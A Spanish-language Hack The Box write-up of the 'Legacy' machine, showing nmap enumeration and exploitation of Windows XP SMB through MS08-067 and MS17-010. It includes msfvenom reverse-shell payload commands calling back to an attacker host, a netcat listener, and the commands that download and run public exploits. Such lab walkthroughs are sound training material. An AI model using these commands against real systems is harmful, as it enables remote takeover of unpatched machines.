Legacy

En este artículo, abordaremos la resolución de la máquina Legacy de la plataforma Hack The Box. Dicha máquina, presenta dos vulnerabilidades en el protocolo SMB. Una de ellas es MS08-067 - RCE (Remote Command Execution) y la otra es MS-17-010 EternalBlue, ambas vulnerabilidades nos otorga acceso como Administrador.

Reconocimiento

Iniciamos como siempre, lanzando una traza ICMP a la máquina objetivo para comprobar que tengamos conectividad.

Reconocimiento usando el comando ping

Vemos que responde al envío de nuestro paquete, verificando de esta manera que tenemos conectividad. Por otra parte, confirmamos que estamos frente a una máquina Windows basandonos en el TTL (Time To Live) 127.

Enumeración

Descubrimiento de puertos abiertos

Realizamos un escaneo con nmap para descubrir que puertos TCP se encuentran abiertos en la máquina víctima.

nmap -sS -p- --open --min-rate 5000 10.10.10.4 -n -Pn -oG scanPorts -vvv

Descubrimiento de puertos abiertos

Enumeración de versión y servicio

Lanzamos una serie de script básicos de enumeración propios de nmap, para conocer la versión y servicio que esta corriendo bajo los puertos abiertos.

nmap -sCV -p135,139,445 10.10.10.4 -oN targeted -vvv

Descubrimiento de versión y servicio con nmap

Explotación

Vulnerabilidad MS08-067

Como observamos en el escaneo anterior, estamos frente a un Windows XP.

Si hacemos una busqueda en Google, nos encontramos que esta versión de Windows es vulnerable a MS08-067, la cual es una vulnerabilidad crítica en el servicio Server de Microsoft Windows, identificada en 2008. Dicha vulnerabilidad, permite la ejecución remota de código y el acceso como Administrador.

Para explotar esta vulnerabilidad, utilizaré este exploit.

Descargamos el script a nuestra máquina atacante.

wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py

Creamos el shellcode con msfvenom.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

Nos ponemos en escucha con netcat por el puerto 443.

rlwrap nc -lnvp 443

Ejecutamos el exploit, indicando los parámetros solicitados.

Ejecución del exploit

Ganamos acceso al sistema como el usuario LEGACY.

Ganamos acceso al sistema

Vulnerabilidad MS-17-010

Para explotar la vulnerabilidad MS-17-010, podemos utilizar este repositorio.

Clonamos el repositorio a nuestro equipo atacante.

git clone https://github.com/helviojunior/MS17-010

Creamos el payload utilizando msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o shell.exe

Nos ponemos en escucha con netcat por el puerto 443.

rlwrap nc -lnvp 443

Ejecutamos el exploit:

python send_and_execute.py 10.10.10.4 shell.exe

Ejecución del exploit

Ganamos acceso al sistema.

De esta forma, ya podemos leer la flag de user.txt y root.txt.

Flags

Concluimos la resolución de la máquina Legacy.

Espero que los conceptos hayan quedado claros y hayas disfrutado del contenido.

¡Gracias por leer!

Happy Hacking!